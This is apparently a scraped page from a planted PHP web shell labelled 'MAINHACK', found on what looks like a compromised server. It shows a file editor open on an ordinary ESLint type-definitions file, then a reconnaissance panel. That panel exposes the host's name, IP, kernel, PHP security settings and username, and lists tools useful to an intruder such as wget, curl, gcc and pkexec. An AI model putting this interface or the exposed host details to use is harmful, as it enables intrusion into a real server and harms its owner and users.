[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: node-commonjs.d.ts
import { Linter } from "../index"; export interface NodeJSAndCommonJS extends Linter.RulesRecord { /** * Rule to require `return` statements after callbacks. * * @since 1.0.0-rc-1 * @see https://eslint.org/docs/rules/callback-return */ "callback-return": Linter.RuleEntry<[string[]]>; /** * Rule to require `require()` calls to be placed at top-level module scope. * * @since 1.4.0 * @see https://eslint.org/docs/rules/global-require */ "global-require": Linter.RuleEntry<[]>; /** * Rule to require error handling in callbacks. * * @since 0.4.5 * @see https://eslint.org/docs/rules/handle-callback-err */ "handle-callback-err": Linter.RuleEntry<[string]>; /** * Rule to disallow use of the `Buffer()` constructor. * * @since 4.0.0-alpha.0 * @see https://eslint.org/docs/rules/no-buffer-constructor */ "no-buffer-constructor": Linter.RuleEntry<[]>; /** * Rule to disallow `require` calls to be mixed with regular variable declarations. * * @since 0.0.9 * @see https://eslint.org/docs/rules/no-mixed-requires */ "no-mixed-requires": Linter.RuleEntry< [ Partial<{ /** * @default false */ grouping: boolean; /** * @default false */ allowCall: boolean; }>, ] >; /** * Rule to disallow `new` operators with calls to `require`. * * @since 0.6.0 * @see https://eslint.org/docs/rules/no-new-require */ "no-new-require": Linter.RuleEntry<[]>; /** * Rule to disallow string concatenation when using `__dirname` and `__filename`. * * @since 0.4.0 * @see https://eslint.org/docs/rules/no-path-concat */ "no-path-concat": Linter.RuleEntry<[]>; /** * Rule to disallow the use of `process.env`. * * @since 0.9.0 * @see https://eslint.org/docs/rules/no-process-env */ "no-process-env": Linter.RuleEntry<[]>; /** * Rule to disallow the use of `process.exit()`. * * @since 0.4.0 * @see https://eslint.org/docs/rules/no-process-exit */ "no-process-exit": Linter.RuleEntry<[]>; /** * Rule to disallow specified modules when loaded by `require`. * * @since 0.6.0 * @see https://eslint.org/docs/rules/no-restricted-modules */ "no-restricted-modules": Linter.RuleEntry< [ ...Array< | string | { name: string; message?: string | undefined; } | Partial<{ paths: Array< | string | { name: string; message?: string | undefined; } >; patterns: string[]; }> > ] >; /** * Rule to disallow synchronous methods. * * @since 0.0.9 * @see https://eslint.org/docs/rules/no-sync */ "no-sync": Linter.RuleEntry< [ { /** * @default false */ allowAtRootLevel: boolean; }, ] >; }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.21 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002